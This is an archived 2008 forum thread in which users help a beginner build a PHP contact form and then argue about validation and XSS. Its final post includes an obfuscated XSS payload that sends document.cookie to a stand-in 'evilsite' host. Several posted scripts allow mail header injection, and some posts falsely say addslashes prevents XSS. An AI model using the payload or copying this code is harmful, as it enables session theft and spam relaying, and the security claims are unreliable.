View Full Version : whats my form action?
Thai-Man-Land
25-10-2008, 04:26 PM
This is my form:
<p><strong>Contact form</strong></p>
<form id="form1" name="form1" method="post" action="send_contact.php">
<p>Name:
<input type="text" name="name" id="name" />
</p>
<p> </p>
<p>E-Mail Address:
<input type="text" name="email" id="email" />
</p>
<p> </p>
<p>Subject of Enquiry:
<input type="text" name="subject" id="subject" />
</p>
<p> </p>
<p>Please enter your message below: </p>
<p>
<textarea name="message" id="message" cols="45" rows="5"></textarea>
</p>
<p align="center">
<input type="submit" name="submit" id="submit" value="Submit" />
<input type="reset" name="reset" id="reset" value="Reset" />
</p>
</form>What would be my form action on send_contact.php?
+rep to all contributors (where possible)
Also - how do I record IP addresses, and show it to users, like on Galaxy-Webhosting?
and how do I make it so you cannot submit the form without the fields filled in?
Sorry for my n00b =[.
TML
Closed by Meti (Forum Moderator): Thread closed due to arguments.
Jackboy
25-10-2008, 04:52 PM
Are you wanting the form to be emailed to you?
Clientside form validation:
<head>
<script>
function validate(){
// compare with ==, a single = would assign instead of test
if(document.form1.name.value==null||document.form1.name.value==''){
alert('Please enter your name.'); return false;
}
if(document.form1.email.value==null||document.form1.email.value==''){
alert('Please enter your email.'); return false;
}
// all checks passed, let the form submit
return true;
}
</script>
</head>
...
<form blahblah... onSubmit="return validate()">
Hopefully that should work.
Thai-Man-Land
25-10-2008, 05:38 PM
Yes, I'd like it emailed to
[email protected]
Iszak
25-10-2008, 09:06 PM
I wouldn't recommend using Jxhn's javascript; you're best off using server-side validation, because people can easily disable javascript, and that means it need not be valid, so you'll need to implement it on the server side anyway.
You can attach the IP by appending $_SERVER['REMOTE_ADDR'] on the email and that will allow the reader to see who emailed it.
I wouldn't recommend using Jxhn's javascript; you're best off using server-side validation, because people can easily disable javascript, and that means it need not be valid, so you'll need to implement it on the server side anyway.
Seriously, who'd do that just to send a blank email? It doesn't really matter if they do; it's only for people that forget or don't realise they have to fill out some fields. If they're really determined they'd use an invisible character, and unless the PHP checked for them then it'd get past that as well.
It's not like his website is gonna get hacked if he doesn't know their name.
And with javascript you can use onBlur to make forms validate when they're deselected.
Iszak
26-10-2008, 08:20 AM
Well, search engines have javascript disabled, and many if not most do submit the forms to extend your site index listing, so you'll get fake emails sent from search engines. Also this will leave your site susceptible to spamming, and I mean, why bother, when it's just as easy to make the backend validate? But hey, up to you; obviously you don't care about spam.
Thai-Man-Land
26-10-2008, 11:24 AM
Thanks for your help.
I'm not worried about people sending spam emails, it's just a website for a client. It's just so people remember to put their email so we can reply to them.
Dreamweaver doesn't have a tool for creating a form action page, so I'm kind of screwed =[
Well, search engines have javascript disabled, and many if not most do submit the forms to extend your site index listing, so you'll get fake emails sent from search engines. Also this will leave your site susceptible to spamming, and I mean, why bother, when it's just as easy to make the backend validate? But hey, up to you; obviously you don't care about spam.
Search engines don't submit forms as far as I know; it's never happened on any site I've run, and if it did happen then the bot would find its way into insecure sites and end up deleting pages, databases etc.
Also you'd need a captcha sort of thing to stop spam.
Dilore
27-10-2008, 12:35 PM
Here, it's in PHP so you don't need to play around.
<b>Form:</b>
<?php
if(isset($_POST['send'])) {
if((empty($name) || empty($email) || empty($subject) || empty($message)) {
echo "One of the fields hasn't been filled in!";
} else {
$name = addslashes(htmlspecialchars($_POST['name']));
$email = addslashes(htmlspecialchars($_POST['email']));
$subject = addslashes(htmlspecialchars($_POST['subject']));
$message = addslashes(htmlspecialchars($_POST['message']));
$ip = $_SERVER['REMOTE_ADDR'];
$mail = "[email protected]";
$sub = "Email from $name";
$msg = "Here's $name's email:
Name: $name
Email: $email
IP: $ip
Subject: $subject
Message: $message";
$headers = "From: $email";
mail("$mail","$sub","$msg","$headers");
echo "Thanks, your form has been sent, we will reply within 24 hours!";
}
} else {
echo "<form method='post' action='$_SERVER[PHP_SELF]'>
Name:<br>
<input type='text' name='name' size='20'><br>
Email:<br>
<input type='text' name='email' size='20'><br>
Subject:<br>
<input type='text' name='subject' size='20'><br>
Message:<br>
<textarea name='message' cols='45' rows='6'></textarea><br>
<input type='submit' name='send' value='Send'>
</form>";
}
?>
Thai-Man-Land
27-10-2008, 01:51 PM
Thanks!
Thai-Man-Land
27-10-2008, 01:58 PM
It doesn't work.
Edited by Meti (Forum Moderator): Please do not double post, when you simply can edit your first post.
Dilore
27-10-2008, 01:59 PM
Post the error?
Thai-Man-Land
27-10-2008, 02:05 PM
I pasted the code into notepad, saved as "form.php" and then opened it in firefox and nothing happened.
Iszak
27-10-2008, 02:22 PM
Okay, well there were a few things wrong with the script that Dilore produced. Firstly it had a syntax error (an excess "(" bracket in the form validation). Secondly he's using addslashes, which might double-slash strings, so they may end up like "code\\'s", as magic quotes is on by default. Thirdly he defines the variables $name, $email, $subject, $message, etc. after it checks if they're empty... well of course they're going to be empty; no such variable exists! But if you must use his terrible example, here is a version which should work.
<b>Form:</b>
<?php
if(isset($_POST['send'])) {
$name = addslashes(htmlspecialchars($_POST['name']));
$email = addslashes(htmlspecialchars($_POST['email']));
$subject = addslashes(htmlspecialchars($_POST['subject']));
$message = addslashes(htmlspecialchars($_POST['message']));
if(empty($name) || empty($email) || empty($subject) || empty($message)) {
echo "One of the fields hasn't been filled in!";
} else {
$ip = $_SERVER['REMOTE_ADDR'];
$mail = "[email protected]";
$sub = "Email from $name";
$msg = "Here's $name's email:
Name: $name
Email: $email
IP: $ip
Subject: $subject
Message: $message";
$headers = "From: $email";
mail("$mail","$sub","$msg","$headers");
echo "Thanks, your form has been sent, we will reply within 24 hours!";
}
} else {
echo "<form method='post' action='$_SERVER[PHP_SELF]'>
Name:<br>
<input type='text' name='name' size='20'><br>
Email:<br>
<input type='text' name='email' size='20'><br>
Subject:<br>
<input type='text' name='subject' size='20'><br>
Message:<br>
<textarea name='message' cols='45' rows='6'></textarea><br>
<input type='submit' name='send' value='Send'>
</form>";
}
?>
But I do not condone it!
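As an added example (not code posted by anyone in this thread), here is a server-side send_contact.php for the OP's original form that applies Iszak's point about validating on the server, records REMOTE_ADDR as the OP asked, and refuses line breaks in the fields that end up in mail headers; the addresses in it are placeholders.

```php
<?php
// Added example, not code posted in this thread: a server-side handler for the
// OP's send_contact.php form (fields name, email, subject, message). Everything
// is validated on the server, line breaks are refused in anything that becomes
// a mail header, and the sender's IP (REMOTE_ADDR) is recorded as the OP asked.
// addslashes is not used: it is for SQL strings and does nothing useful here.

// Placeholder recipient; the thread's real address is redacted.
const CONTACT_TO = 'you@example.com';

/**
 * Validate the posted fields. Returns a list of error strings (empty = valid).
 * email and subject end up in mail headers, so a CR or LF in them would let a
 * visitor append headers of their own (e.g. extra recipients) through mail().
 */
function validate_contact(array $post): array
{
    $errors = [];
    foreach (['name', 'email', 'subject', 'message'] as $field) {
        if (!isset($post[$field]) || trim((string) $post[$field]) === '') {
            $errors[] = "The '$field' field has not been filled in.";
        }
    }
    $email = trim((string) ($post['email'] ?? ''));
    if ($email !== '' && filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        $errors[] = 'The e-mail address is not valid.';
    }
    foreach (['email', 'subject'] as $field) {
        if (preg_match('/[\r\n]/', (string) ($post[$field] ?? ''))) {
            $errors[] = "The '$field' field must be a single line.";
        }
    }
    return $errors;
}

/** Build the plain-text body; the IP goes in so the reader can see it. */
function build_body(array $post, string $ip): string
{
    return 'Name: ' . trim($post['name']) . "\n"
         . 'Email: ' . trim($post['email']) . "\n"
         . "IP: $ip\n"
         . 'Subject: ' . trim($post['subject']) . "\n\n"
         . trim($post['message']) . "\n";
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $errors = validate_contact($_POST);
    if ($errors) {
        // htmlspecialchars belongs here, where text is echoed into an HTML page.
        foreach ($errors as $e) {
            echo '<p>' . htmlspecialchars($e, ENT_QUOTES, 'UTF-8') . "</p>\n";
        }
    } else {
        $ip = $_SERVER['REMOTE_ADDR'] ?? 'unknown';
        // From: is our own address (placeholder); the visitor's address goes in
        // Reply-To, so replying still works without forging the sender.
        $headers = "From: contact-form@example.com\r\n"
                 . 'Reply-To: ' . trim($_POST['email']) . "\r\n";
        mail(CONTACT_TO, 'Contact form: ' . trim($_POST['subject']),
             build_body($_POST, $ip), $headers);
        echo '<p>Thanks, your message has been sent.</p>';
    }
}
?>
```

Point the original form's action at this file; the client-side validate() from earlier in the thread can stay as a convenience, but this is the check that actually holds.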
Dilore
27-10-2008, 02:25 PM
That's where you're wrong, Iszak.. there are variables there if you look, $name and so on.. If the recipient doesn't fill in one of those fields they will get a message telling them that they haven't filled one in, so it works. The only syntax error I can see is with the last bracket, it needs 2.
Iszak
27-10-2008, 02:28 PM
Yes, except.. there are no variables called $name, $email, $subject etc. prior, so look at this example.
<?php
if (isset($_POST['send']))
{
if(empty($name) || empty($email) || empty($subject) || empty($message))
{
echo "One of the fields hasn't been filled in!";
}
else
{
$name = addslashes(htmlspecialchars($_POST['name']));
$email = addslashes(htmlspecialchars($_POST['email']));
$subject = addslashes(htmlspecialchars($_POST['subject']));
$message = addslashes(htmlspecialchars($_POST['message']));
// The other code
}
}
else
{
// The else
}
?>
Taken directly from your code; as you can see, it's checking if $name, $value, etc. are empty, yet there are no values assigned to those until later, once it's passed the form validation.
Yes, except.. there are no variables called $name, $email, $subject etc. prior, so look at this example.
<?php
if (isset($_POST['send']))
{
if(empty($name) || empty($email) || empty($subject) || empty($message))
{
echo "One of the fields hasn't been filled in!";
}
else
{
$name = addslashes(htmlspecialchars($_POST['name']));
$email = addslashes(htmlspecialchars($_POST['email']));
$subject = addslashes(htmlspecialchars($_POST['subject']));
$message = addslashes(htmlspecialchars($_POST['message']));
// The other code
}
}
else
{
// The else
}
?>
Taken directly from your code; as you can see, it's checking if $name, $value, etc. are empty, yet there are no values assigned to those until later, once it's passed the form validation.
Variables don't have to be declared, it's just better coding if they are.
If I made a script like this:
<?php echo $lol; ?>
and went to script.php?lol=John, 'John' would be output.
I don't see the point in using addslashes and htmlspecialchars though. It's going to an email so there's no risk of XSS and there's no SQL, so no risk of SQL injection.
Excellent2
27-10-2008, 08:25 PM
Yes, except.. there are no variables called $name, $email, $subject etc. prior, so look at this example.
<?php
if (isset($_POST['send']))
{
if(empty($name) || empty($email) || empty($subject) || empty($message))
{
echo "One of the fields hasn't been filled in!";
}
else
{
$name = addslashes(htmlspecialchars($_POST['name']));
$email = addslashes(htmlspecialchars($_POST['email']));
$subject = addslashes(htmlspecialchars($_POST['subject']));
$message = addslashes(htmlspecialchars($_POST['message']));
// The other code
}
}
else
{
// The else
}
?>
Taken directly from your code; as you can see, it's checking if $name, $value, etc. are empty, yet there are no values assigned to those until later, once it's passed the form validation.
That's what it is meant to do? If they submit the form and don't fill in any fields, when they press Submit it will kick them an error.
Iszak
27-10-2008, 08:44 PM
Jxhn, are you a complete noob that wants to act as if you know what you're talking about? Because that's what it seems like. Firstly, by making a page called file.php with the following code
<?php echo $lol; ?> and then going to the url file.php?lol=John, it will not output "John", it will output nothing! because $lol isn't assigned to any variable. You can get it like that though by using extract($_GET); such an example is like
<?php
extract($_GET);
echo $lol; ?> but other than that, your comment makes you look like an idiot. Secondly, I said nothing about XSS or SQL injections; I was simply only using what the guy who posted used and the negatives of using it. Thirdly, XSS attacks can be dangerous: by using it they could add javascript which could result in a hijack of their session etc. Just have a look at an XSS example by wikipedia.
DOM-based attack
1. Mallory sends the URL of a maliciously constructed web page to Alice, using email or another mechanism.
2. Alice clicks on the link.
3. The malicious web page's JavaScript opens a vulnerable HTML page installed locally on Alice's computer.
4. The vulnerable HTML page contains JavaScript which executes in Alice's computer's local zone.
5. Mallory's malicious script now may run commands with the privileges Alice holds on her own computer.
Yeah, no real XSS danger there!
Excellent2 - That's only a snippet of the original code but that's the general idea it was mainly from Dilore though.
Seriously Jxhn if you're going to make claims at least have the knowledge to back it up.
Jxhn, are you a complete noob that wants to act as if you know what you're talking about? Because that's what it seems like. Firstly, by making a page called file.php with the following code
<?php echo $lol; ?> and then going to the url file.php?lol=John, it will not output "John", it will output nothing! because $lol isn't assigned to any variable. You can get it like that though by using extract($_GET); such an example is like
<?php
extract($_GET);
echo $lol; ?> but other than that, your comment makes you look like an idiot. Secondly, I said nothing about XSS or SQL injections; I was simply only using what the guy who posted used and the negatives of using it. Thirdly, XSS attacks can be dangerous: by using it they could add javascript which could result in a hijack of their session etc. Just have a look at an XSS example by wikipedia.
Yeah, no real XSS danger there!
Excellent2 - That's only a snippet of the original code but that's the general idea it was mainly from Dilore though.
Seriously Jxhn if you're going to make claims at least have the knowledge to back it up.
No, I know what I'm talking about, because it's only very simple php. Which is why I don't reply to a lot of other topics.
Try the file yourself before having a fit at me. How do you think variable poisoning works? It's because variables don't have to be declared.
http://johnphptest.freehostia.com/loljohn.php?lol=John
And as for the XSS, I wasn't talking to you specifically about that, but there's no danger, because it's being sent to an email. So unless the email site is vulnerable to XSS then there is no vulnerability. And if it was, then attackers could send emails themselves without his form, provided they knew the address.
Iszak
28-10-2008, 04:44 PM
FreeHostia obviously extracts the variables, but the majority of servers do not do this; if you actually had your own host you'd be able to tell. Here, look at my example, then get a real host: http://iszak.net/lolatjxhn.php?jxhn=Noob Now do you see? On a real host echo $jxhn does not output "Noob", because most hosts are not crap free hosts. Also, if you read what I quoted about XSS, you could see that the form does pose a threat if gpc magic quotes is disabled and no stripping is done. READ.
1. Mallory sends the URL of a maliciously constructed web page to Alice, using email or another mechanism.
2. Alice clicks on the link.
3. The malicious web page's JavaScript opens a vulnerable HTML page installed locally on Alice's computer.
4. The vulnerable HTML page contains JavaScript which executes in Alice's computer's local zone.
5. Mallory's malicious script now may run commands with the privileges Alice holds on her own computer.
oh what's that on the first line?
1. Mallory sends the URL of a maliciously constructed web page to Alice, using email or another mechanism.
WOW USING AN EMAIL! Hence my point, if they enter their content and send it - they could potentially add their own hyperlink, the receiver of the email can then go from there look at no. 2 onwards. I think I know a little more about PHP than you, and you're only making yourself look like a bigger noob.
Edit: And if the host did this for both $_GET and $_POST data, well this could cause conflicts if the naming is the same, I'm sure there is a reason why most hosts have this 'feature' disabled.
Tylenol
29-10-2008, 03:24 AM
Iszak usually knows what he is talking about; he's done many scripts for me that work fine.
Calon
29-10-2008, 06:01 AM
FreeHostia obviously extracts the variables, but the majority of servers do not do this; if you actually had your own host you'd be able to tell. Here, look at my example, then get a real host: http://iszak.net/lolatjxhn.php?jxhn=Noob Now do you see? On a real host echo $jxhn does not output "Noob", because most hosts are not crap free hosts. Also, if you read what I quoted about XSS, you could see that the form does pose a threat if gpc magic quotes is disabled and no stripping is done. READ.
oh what's that on the first line?
WOW USING AN EMAIL! Hence my point, if they enter their content and send it - they could potentially add their own hyperlink, the receiver of the email can then go from there look at no. 2 onwards. I think I know a little more about PHP than you, and you're only making yourself look like a bigger noob.
Edit: And if the host did this for both $_GET and $_POST data, well this could cause conflicts if the naming is the same, I'm sure there is a reason why most hosts have this 'feature' disabled.
I agree that he's making himself look like a bigger noob than he already is.
FreeHostia obviously extracts the variables, but the majority of servers do not do this; if you actually had your own host you'd be able to tell. Here, look at my example, then get a real host: http://iszak.net/lolatjxhn.php?jxhn=Noob Now do you see? On a real host echo $jxhn does not output "Noob", because most hosts are not crap free hosts. Also, if you read what I quoted about XSS, you could see that the form does pose a threat if gpc magic quotes is disabled and no stripping is done. READ.
oh what's that on the first line?
WOW USING AN EMAIL! Hence my point, if they enter their content and send it - they could potentially add their own hyperlink, the receiver of the email can then go from there look at no. 2 onwards. I think I know a little more about PHP than you, and you're only making yourself look like a bigger noob.
Edit: And if the host did this for both $_GET and $_POST data, well this could cause conflicts if the naming is the same, I'm sure there is a reason why most hosts have this 'feature' disabled.
Well, sorry. I'd always thought they didn't need to be declared. It's something to do with the php settings about register globals I think. You must have been right.
I still don't agree on the XSS side though. All of those sorts of things have been patched by browsers for years, and why would the link have to have been sent through email? If they were easily possible then the link I sent you back there could have done it to you. I don't consider what you described to be XSS. XSS is not prevented by magicquotes or addslashes btw.
The reason I don't have my own host is because I don't have any websites and I'm not gonna buy one just to mess about.
I think you need to grow up a little though, calling someone a noob when they oppose you, even if they're wrong will just make you look immature. It's like when someone calls a chav gay (no offence to homosexuals (or chavs)). Like many others in the coding community here I think you just need to calm down a bit. If I said "I think I know little more about XSS and SQL injections than you", you'd think I was being cocky.
Iszak
29-10-2008, 09:28 AM
Firstly, you're right, the link you sent could easily have done it. Secondly, that example is from wikipedia; now yes, anyone can edit wikipedia, but it's likely to be correct as it's moderated. Thirdly, XSS can be prevented via addslashes or magicquotes; for example, by using addslashes you may prevent people inserting javascript. This is XSS. Thirdly, if you say you knew a little more about XSS and SQL injections than me, I'd probably believe you, although I would question it somewhat. I'm not into XSS and SQL injections massively, more so PHP. But if someone is going to tell me that I'm wrong when I've got experience under my belt, I'm not going to allow you to walk all over me and say some incorrect information which other people might believe. That is why I was immature and called you a noob, because you were stubborn and wouldn't believe me; but then again you have no reason to believe me.
Firstly, you're right, the link you sent could easily have done it. Secondly, that example is from wikipedia; now yes, anyone can edit wikipedia, but it's likely to be correct as it's moderated. Thirdly, XSS can be prevented via addslashes or magicquotes; for example, by using addslashes you may prevent people inserting javascript. This is XSS. Thirdly, if you say you knew a little more about XSS and SQL injections than me, I'd probably believe you, although I would question it somewhat. I'm not into XSS and SQL injections massively, more so PHP. But if someone is going to tell me that I'm wrong when I've got experience under my belt, I'm not going to allow you to walk all over me and say some incorrect information which other people might believe. That is why I was immature and called you a noob, because you were stubborn and wouldn't believe me; but then again you have no reason to believe me.
Thanks for the recognition.
Btw example of XSS without quotes:
http://somesite.com/transparentimage.gif height=100 width=100% onmouseover=document.location=String.fromCharCode( 104,116,116,112,58,47,47,101,118,105,108,115,105,1 16,101,46,99,111,109,47,115,116,101,97,108,101,114 ,46,112,104,112,63,99,111,111,107,105,101,61)+docu ment.cookie style=position:absolute;left:0px;top:0px
This thread has got quite off topic, so this will probably be my last post in it.
Powered by vBulletin® Version 4.2.5 Copyright © 2025 vBulletin Solutions Inc. All rights reserved.